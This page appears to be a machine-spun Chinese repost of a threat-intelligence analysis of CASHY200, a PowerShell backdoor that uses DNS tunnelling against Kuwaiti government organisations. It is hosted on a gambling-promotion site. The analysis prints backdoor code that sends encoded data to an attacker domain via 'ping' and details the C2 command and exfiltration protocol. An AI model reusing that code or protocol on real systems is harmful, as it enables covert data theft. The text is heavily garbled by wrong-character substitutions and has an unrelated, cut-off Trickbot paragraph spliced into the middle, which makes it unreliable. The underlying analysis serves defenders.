延续匹敌xHunt:经由过程DNS隧道检测阻挠新型PowerShell后门 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

延续匹敌xHunt:经由过程DNS隧道检测阻挠新型PowerShell后门

申博_安全防护 申博 60次浏览 已收录 0个评论

择要

在对xHunt运动的延续剖析历程当中,我们观察到存在与pasta58[.]com域名相干联的多个域名,这些域名与已知的Sakabota敕令和掌握(C2)运动相干。在2019年6月,我们观察到个中一个重复运用的域名(windows64x[.]com)被用作新的基于PowerShell后门的C2效劳器,我们将其命名为CASHY200。该PowerShell后门运用DNS隧道与其C2效劳器举行通讯,经由历程向上述域名所对应的进击者掌握的域名效劳器发出DNS A查询来完成。CASHY200剖析C2效劳器在DNS回覆中供应的数据,以在体系上运转敕令,并将效果经由历程DNS查询的体式格局发送回C2。在我们所剖析的几个样本中,CASHY200都运用了随机生成的标识符,这些标识符存储在注册表的HKCU\Software\Microsoft\Cashe\index当中,并运用敕令值200与C2效劳器举行通讯。上述细致信息,是我们之所以将其命名为CASHY200的依据。

只管我们如今还没有经由历程遥测发明CASHY200 PowerShell后门是怎样托付的,但在2019年9月,我们观察到一台位于科威特的主机运用与CASHY200 Payload雷同的DNS隧道协定向windows64x[.]com域名发送信标。荣幸的是,我们的DNS平安效劳阻挠了向该域名发出信标的历程,因而进击者没法再运用这个DNS隧道与Payload举行通讯。经由对这一东西举行剖析,参考此前的开源收集事情效果,我们发明,从2018年春季入手下手,直至2019年,针对科威特政府构造的进击者大概延续在运用CASHY200举行进击。

CASHY200进击

2019年9月16日,科威特的一家构造入手下手运用我们的DNS平安效劳,在几分钟内,DNS平安效劳就检测到歹意DNS隧道运动。DNS隧道正在与Windows64x[.]com域名举行通讯,而该域名此前与xHunt歹意运动相干联,这一歹意运动主要针对科威特的船运和陆运构造。在阻挠DNS隧道以后,进击者不再具有接见受感染体系的才能。而关于致使DNS隧道装置Payload的初始突破口,我们如今还没有经由历程遥测发明。

在观察这一歹意运动时,我们发明了一个基于能够与windows64x[.]com举行通讯的Payload的CASHY200 PowerShell。我们剖析了这个PowerShell剧本,发明其DNS隧道协定与科威特构造的出站DNS要求相匹配,但该要求被DNS平安效劳阻挠。我们将在本文的背面细致剖析CASHY200及其DNS隧道协定。

在收集了分外的CASHY200样本以后,我们发明了证据,表明要挟构造正在主动开发这类基于PowerShell的东西,并在其进击运动中运用。在研讨歹意样本发展历程时,我们发明了一些能够追溯到2018年5至6月的样本。在2018年5月1日和6月3日,我们初次发明有可实行文件装置并实行与域名windows-updates[.]com和firewallsupports[.]com通讯的CASHY200 PowerShell剧本。我们没有经由历程遥测肯定这些Payload所影响的构造,然则,@Voulnet的推文宣称进击者运用Word文档运载PowerShell Payload,运用firewallsupports[.]com作为C2,针对科威特的政府构造发起进击。

延续匹敌xHunt:经由过程DNS隧道检测阻挠新型PowerShell后门

只管我们没法确认该歹意构造是不是将CASHY200 Payload设置为与firewallsupports[.]com举行通讯以对科威特的目标政府构造举行进击,但我们确切发明了包含CASHY200 Payload的Word文档,个中Payload设置了上述域名作为C2,文档中还包含科威特政府构造的LOGO,以此作为社会工程学引诱图片的一部分。这与在xHunt歹意运动中观察到的进击目标相一致,在xHunt歹意运动中,进击仅仅针对科威特的构造。下面列出了我们发明的歹意Word文档,这些文档表明该歹意构造还同时运用另一个C2域名winx64-microsoft[.]com。

装置CASHY200 Payload的歹意Word文档:

修正时候:2018年8月20日 7:00:00

SHA256:bce37fc0…

文件名:عيد الأضحى.docm

C2域名:firewallsupports[.]com

修正时候:2018年8月13日 9:07:00

SHA256:5a3c156…

文件名:دلیل تسجیل الدخول.docm

C2域名:firewallsupports[.]com

修正时候:1980年1月1日 00:00

SHA256:45b2db5…

文件名:Update list soft-Ad.docm

C2域名:winx64-microsoft[.]com

修正时候:2018年7月4日 5:45:00

SHA256:ce6b44af…

文件名:قائمة النماذج العامة01.docm

C2域名:firewallsupports[.]com

修正时候:2018年7月4日 6:10:00

SHA256:0b54763…

文件名:قائمة النماذج العامة02.docm

C2域名:firewallsupports[.]com

修正时候:2018年7月4日 6:09:00

SHA256:396235b…

文件名:قائمة النماذج العامة03.docm

C2域名:firewallsupports[.]com

值得关注的是,在2019年5月14日,有用户在Microsoft的TechNet论坛上宣布了一条音讯,称该用户在他们的两台效劳器上发明了与域名windows64x[.]com相干的运动,并愿望供应关于这一状况的更多信息。该用户形貌的运动,与我们在科威特某政府构造中阻挠的要挟比拟,运用了雷同的域名和雷同的DNS隧道协定。只管我们没法确认发文职员的细致身份,但依据论坛帖子中供应的细致信息,我们以为这人也曾在别的一个科威特政府构造中事情。

TechNet帖子中供应的另一个值得关注的细节是,运用敕令ping -n 1 <domain>生成了对DNS隧道的查询。以下面代码所示,在设置C2为firewallsupports[.]com的CASHY200样本中,我们观察到运用雷同手艺来为DNS隧道发出查询。假如用户(在此处是歹意剧本)运用ping+域名,那末应用程序会在发出ICMP音讯去ping长途体系之前尝试剖析该域名。用这类体式格局去ping,就能够有效地发出DNS隧道查询。

CASHY200样本中的代码,运用ping -n 1向firewallsupports[.]com发出DNS查询:

$domain = $rnd + $in + $id + $coun + $data +
'.firewallsupports[.]com'
$get = cmd /c ping -n 1 $domain

一样,我们还发明别的一个CASHY200样本,该样本以与ping雷同的体式格局运用了nslookup敕令,但将域名改为了windows64x[.]com。该样本运用nslookup -type=a <domain>敕令发出DNS查询,同时也进一步加强了两个域名之间的关联性。

CASHY200 DNS隧道协定

我们对样本文件(eccc65711cbd154f680e8c8ef343d53f29e4a6237510abd4ad1eab5742b035b3)举行了剖析,以便相识Payload的功用,并剖析在科威特某政府构造中构造的DNS隧道协定。该样本与域名windows64x[.]com举行通讯。DNS隧道协定依托DNS A查询将数据从木马发送到查询域名的子域名所对应的C2效劳器,并经由历程C2效劳器吸收IPv4回覆的数据。与该歹意运动相干的CASHY200样本能够发出两个差别的敕令,以下所示,会运用以48或92开头的IPv4回覆来复兴初始信标的查询。

CASHY200中可用的敕令及其功用:

IPv4敕令:48.x.x.x

敕令形貌:运转“hostname”敕令,然后将效果经由历程DNS隧道发送到C2。

IPv4敕令:92.<# of queries>.x.x

敕令形貌:从后续DNS查询的回覆中猎取敕令以运转,并将效果经由历程DNS隧道发送到C2。第二组8位字节用于关照Payload发出多少个DNS查询以猎取敕令。

将windows-updates[.]com和firewallsupports[.]com用作C2域名的初期CASHY200样本仅包含一个可用敕令,该敕令运用200作为IPv4回覆的第一组8位字节。这一敕令与上面形貌的92敕令具有雷同的功用。针对初期歹意样本,现实不须要48敕令,由于它们是在初始信标中供应体系的组几名,而不须要从C2要求。敕令值200也是我们将该歹意软件命名为“CASHY200”的一个缘由。

一般,由CASHY200为其DNS隧道生成的域名构造以下所示。数据盗取的序列号和数据是可选的,而且依据木马的要求范例常常为空。比方,作为新标的第一个DNS查询就不包含序列号或数据盗取字段。另外,初期的CASHY200样本运用4个随机字符,而不是5个。

CASHY200为其DNS隧道协定生成的DNS查询的构造:

<5个随机字符><十六进制要求范例><十六进制唯一主机名><序列号><数据盗取>.windows64x[.]com

要求范例字段许可CASHY200示知C2效劳器其发出DNS查询的目标。这许可C2效劳器运用DNS回覆中恰当的IPv4地点来相应入站查询。下表供应了一切可用的要求范例以及DNS查询的目标。最主要的是,运用windows64x[.]com作为C2效劳器的CASHY200样本能够在对d或q要求范例的相应中吸收敕令,而初期样本只能处置惩罚q要求范例的相应中的敕令。

CASHY200将用于关照C2每一个DNS查询目标的要求范例:

d  初始的“hello”信标

q  要求敕令信标

f  完成发送效果

c  发送行将发送的查询数,以自定义敕令效果

h  在IPv4回覆中从C2猎取数据

a  在子域名内发送主机名敕令的效果

r  在子域名内发送自定义敕令的效果

Trickbot更新密码窃取模块

Trickbot 是2016年首次出现的从有漏洞的Windows主机窃取系统信息、登陆凭证和其他敏感数据的一款恶意软件。Trickbot是一种模块化的恶意软件,其中一个模块就算密码获取模块。2019年11月,研究人员发现Trickbot的密码窃取模块的目标转向了OpenSSH和OpenVPN应用。 Trickbot模块 感染了Trickbot的Windows主机会下载不同的模块来执行不同的功能。这些模块以加密二进制文件的形式保存在受感染用户的AppData\Roaming文件夹中。然后加密的二进制文件会解码为DLL文件,并在系统内存中运行。图1是2019年11月8日Trickbot感染64位Windows 7系统主机生成的编码的Trickbot模块。  图 1. 2019年11月8日Trickbot 感

在被DNS平安效劳阻挠的CASHY200隧道中,<十六进制唯一主机名>是一个字符串,被进击者硬编码在木马中,该字符串关于每一个受感染的主机来讲似乎是唯一的。这一硬编码的主机名表明,要挟进击者特地为受感染的主机创建了CASHY样本,如许也能使我们疾速肯定受感染的主机,并举行弥补。初期的CASHY200样本运用木马存储在注册表中的随机生成标识符举行辨别,个中的一个位置是“HKCU\Software\Microsoft\Cashe\index”,这也是“CASHY200”称号劈头之一。

如前所述,当CASHY200将数据发送到C2效劳器时,序列号仅出如今查询的子域名中。CASHY200以101作为肇端序列号,并在每次发送查询时将该值递增,直至一切数据都传输到C2。

CASHY200 DNS隧道示例

为了进一步相识CASHY200运用的DNS隧道协定并举行可视化,我们竖立了一个C2效劳器来与后门举行交互,并向后门发出敕令。我们竖立了C2效劳器,与设置为windows64x[.]com的CASHY200样本举行交互,该样本能够处置惩罚两个敕令:DNS A纪录回覆第一组8位字节中为48或92的敕令(细致请见上一章)。下图展现了CASHY200与我们竖立的C2效劳器举行交互时的收集数据包捕捉。在截图中能够看到,CASHY200吸收到“hostname”敕令,背面会紧接着一个自定义敕令“whoami”,这两个敕令的运转效果都邑传送回C2。

迥殊申明的是,下图表明DNS效劳器以1.2.3.4相应这些查询,这只是我们在C2效劳器中运用的占位符,由于CASHY200在发送数据时会疏忽DNS相应。

与CASHY200关联的DNS流量吸收和相应“hostname”,背面是自定义敕令“whoami”:

延续匹敌xHunt:经由过程DNS隧道检测阻挠新型PowerShell后门

在上图中,要剖析的第一个DNS查询是yFIOr645245444143544544.windows64x[.]com,这也是初始信标。个中,前五个字符(yFIOr)是随机的,除生成随机子域名以防止DNS缓存以外,没有其他作用。接下来的两个字符(64)是十六进制示意,代表d要求范例,这是初始信标的要求范例。要求范例背面接着硬编码到样本中的体系特定主机名,在此示例中5245444143544544示意<REDACTED>。

要发出48敕令以猎取体系的主机名,C2效劳器将运用48作为IPv4回覆的第一组8位字节(48.0.0.0)来相应初始信标查询。C2效劳器不须要发出特定的IPv4地点,由于CASHY200会疏忽盈余的三个8位字节,并运转“hostname”敕令。我们测试体系的主机名是test-system-ftw,CASHY200将该主机名经由历程一系列DNS查询发送到C2效劳器以剖析,细致以下:

pevtF6152454441435445443130316447567a6443317a65584e305a57303d.windows64x[.]com    diosk6152454441435445443130324c575a3064773d3d.windows64x[.]com

weDlz615245444143544544313033.windows64x[.]com

这些DNS查询包含“hostname”敕令的效果,运用三个查询子域名中的要求范例a(61)来传输数据。在要求范例后,是这些DNS查询中须要发出的数据。在Base64解码每一个查询中的数据之前,C2效劳器运用序列号将查询效果准确分列。以我们的示例为例,从十六进制转换的效果为101dGVzdC1zeXN0ZW0、102LWZ0dw==和103。随后,C2效劳器将来自每一个查询的解码后数据衔接起来,并构成终究的效果。下面展现了C2怎样处置惩罚CASHY200发送的“hostname”敕令效果,并生成test-system-ftw。

CASHY200发送的相应“hostname”敕令的C2处置惩罚数据:

序列号:101

编码后数据:dGVzdC1zeXN0ZW0=

解码后数据:test-system

序列号:102

编码后数据:LWZ0dw==

解码后数据:-ftw

序列号:103

编码后数据:(无数据)

解码后数据:(无数据)

在发送完成“hostname”敕令的效果以后,CASHY200发出要求范例为f(子域名为66)的UDmEJ665245444143544544.windows64x[.]com DNS查询,以关照C2发送数据已完成。发送“hostname”敕令的效果后,CASHY200发出查询,以剖析要求范例为q(子域名为71)的GmhpF715245444143544544.windows64x[.]com。CASHY200发出此要求以从C2效劳器猎取自定义敕令,并在敕令提示符下运转。

上图中捕捉到的数据包表明,我们的C2效劳器以q要求范例和92.2.0.0的IPv4地点来相应CASHY200的查询。如上文所述,CASHY200会将这个IPv4地点剖析为自定义敕令,并将IPv4的第一个8位字节(92)示意为已发出的自定义敕令,将第二个8位字节(2)剖析为后门必需发出DNS查询数目,以从C2效劳器的查询回覆中下载完全敕令。敕令数据是经由历程DNS回覆中的IPv4地点发出的,这是一种异常低效的数据传输体式格局,由于C2只能针对木马发出的每一个DNS查询要求复兴4个字节的数据。

依据回覆的IPv4地点92.0.0.0,CASHY200发出以下两个DNS查询,两个查询的要求范例均为h(子域名为68),序列号为100和101(子域名为313030和313031):

iQKEe685245444143544544313030.windows64x[.]com

TyxLC685245444143544544313031.windows64x[.]com

C2效劳器运用IPv4地点119.104.111.97和109.105.0.0回覆这两个查询,CASHY200经由历程将每组8位字节视为一个数据字节并衔接一切字节以吸收敕令的体式格局来处置惩罚这两个查询。比方,下面展现了CASHY200怎样处置惩罚两个IPv4回覆,以取得敕令“whoami”。

CASHY200处置惩罚来自C2的IPv4回覆,以猎取自定义敕令来运转“whoami”:

IPv4回覆:119.104.111.97

对应ASCII示意:‘w’.’h’.’o’.’a’

字符串:whoa

IPv4回覆:109.105.0.0

对应ASCII示意:‘m’.’i’.’\x00’.’\x00’

字符串:mi

运转自定义敕令“whoami”后,CASHY200将效果发送到C2效劳器的体式格局与前面所议论的“hostname”敕令的发送体式格局略有差别。CASHY200经由历程发出查询以剖析YqpZf6352454441435445443.windows64x[.]com来入手下手发送自定义敕令的效果,该查询包含要求范例c(子域名为63)和数字3作为数据字段。CASHY200运用该要求的数据字段中的数字来关照C2,示知要想传输自定义敕令的效果,现实须要发出的查询数目。

在发送了传输完全效果所须要的查询数目以后,CASHY200发出了以下三个查询,一切查询的要求范例均为r(子域名中为72):

QMNnv7252454441435445443130316447567a6443317a65584e305a57303d.windows64x[.]com  OlBCh7252454441435445443130324c575a30643178305a584e304c513d3d.windows64x[.]com  XUkra72524544414354454431303364584e6c63673d3d.windows64x[.]com

用于发送自定义敕令效果的三个查询,包含一个从101入手下手的序列号,该序列号背面是数据,每一个数据均以十六进制字节示意。在对十六进制字节举行转换后,发明分别是dGVzdC1zeXN0ZW0=、LWZ0d1x0ZXN0LQ==和dXNlcg==,示意自定义“whoami”敕令返回的Base64编码后的效果,在我们的示例中应为“test-system-ftw\test-user”。下表展现了C2效劳器怎样处置惩罚CASHY200发出的三个查询,以通报自定义敕令效果的历程稿。

CASHY200相应自定义敕令“whoami”发送的C2处置惩罚数据:

序列号:101

编码后数据:dGVzdC1zeXN0ZW0=

解码后数据:test-system

序列号:102

编码后数据:LWZ0d1x0ZXN0LQ==

解码后数据:-ftw\test-

序列号:103

编码后数据:dXNlcg==

解码后数据:user

在发送自定义“whoami”敕令的效果以后,CASHY200发出要求范例为f(子域名为66)的DNS查询fvSwZ665245444143544544.windows64x[.]com,以关照C2发送数据完成。

总结

依据我们的剖析,我们发明在xHunt歹意运动中运用了多种自定义东西,针对科威特的构造发起进击。本次我们发明了一个命名为CASHY200的自定义东西,这是一个基于PowerShell的后门,能够运用DNS隧道与C2效劳器举行通讯。经由历程谍报收集,我们发明了相干证据,表明歹意构造运用CASHY200进击科威特的政府构造。只管我们没法确认细致是哪一个构造,但依据DNS平安效劳的遥测,我们确认该歹意构造还进击了另一个位于科威特的构造。这些发明表明,这个歹意构造自2018年春季至2019年以来延续针对科威特构造发起进击,个中包含政府构造、船运和陆运的产业构造。

Palo Alto Networks发起用户采用以下步伐提防要挟:

1、在要挟谍报中检察xHunt和CASHY200标签,以延续猎取该歹意运动的相干目标。

2、运用DNS平安自动检测,检测本文中形貌的DNS隧道协定。

3、运用要挟防护和URL过滤,对C2域名windows64x[.]com、firewallsupports[.]com、windows-updates[.]com和winx64-microsoft[.]com举行过滤。

4、运用反病毒软件,检测CASHY200歹意样本。

5、在DNS平安产品上阻挠CASHY200隧道协定。

迥殊感谢Liu Daiping和Jun Javier Wang供应关于DNS平安效劳怎样阻挠该DNS隧道运动的细致细节。

本文翻译自:https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明延续匹敌xHunt:经由过程DNS隧道检测阻挠新型PowerShell后门
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址